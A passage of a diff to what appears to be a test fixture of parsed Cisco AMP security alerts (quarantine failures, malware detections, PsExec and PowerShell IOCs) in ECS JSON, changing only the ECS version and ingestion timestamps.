found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
@@ -1254,7 +1254,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1275,7 +1275,7 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-12T17:32:35.701365008Z",
+                "ingested": "2021-09-13T18:06:29.783749146Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
@@ -1326,7 +1326,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1347,7 +1347,7 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-12T17:32:35.701366987Z",
+                "ingested": "2021-09-13T18:06:29.783751302Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
@@ -1398,7 +1398,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1419,7 +1419,7 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-12T17:32:35.701368848Z",
+                "ingested": "2021-09-13T18:06:29.783753383Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
@@ -1470,7 +1470,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1491,7 +1491,7 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-12T17:32:35.701370740Z",
+                "ingested": "2021-09-13T18:06:29.783755459Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
@@ -1553,7 +1553,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1583,7 +1583,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701372604Z",
+                "ingested": "2021-09-13T18:06:29.783757523Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1646,7 +1646,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1666,7 +1666,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701374528Z",
+                "ingested": "2021-09-13T18:06:29.783759589Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T09:56:55.000Z",
@@ -1729,7 +1729,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1755,7 +1755,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-12T17:32:35.701376409Z",
+                "ingested": "2021-09-13T18:06:29.783761660Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -1813,7 +1813,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1833,7 +1833,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701378300Z",
+                "ingested": "2021-09-13T18:06:29.783763725Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T05:49:06.000Z",
@@ -1893,7 +1893,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1913,7 +1913,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701380257Z",
+                "ingested": "2021-09-13T18:06:29.783765876Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
@@ -1968,7 +1968,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1994,7 +1994,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-12T17:32:35.701382106Z",
+                "ingested": "2021-09-13T18:06:29.783767954Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -2040,7 +2040,7 @@
         {
             "@timestamp": "2021-01-14T00:02:08.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2058,7 +2058,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:35.701383971Z",
+                "ingested": "2021-09-13T18:06:29.783770016Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583671182384431000",
                 "kind": "alert"
@@ -2100,7 +2100,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2120,7 +2120,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701385864Z",
+                "ingested": "2021-09-13T18:06:29.783772071Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2175,7 +2175,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2195,7 +2195,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701387740Z",
+                "ingested": "2021-09-13T18:06:29.783774129Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -2248,7 +2248,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2272,7 +2272,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701389617Z",
+                "ingested": "2021-09-13T18:06:29.783776187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2329,7 +2329,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2355,7 +2355,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701391536Z",
+                "ingested": "2021-09-13T18:06:29.783778260Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 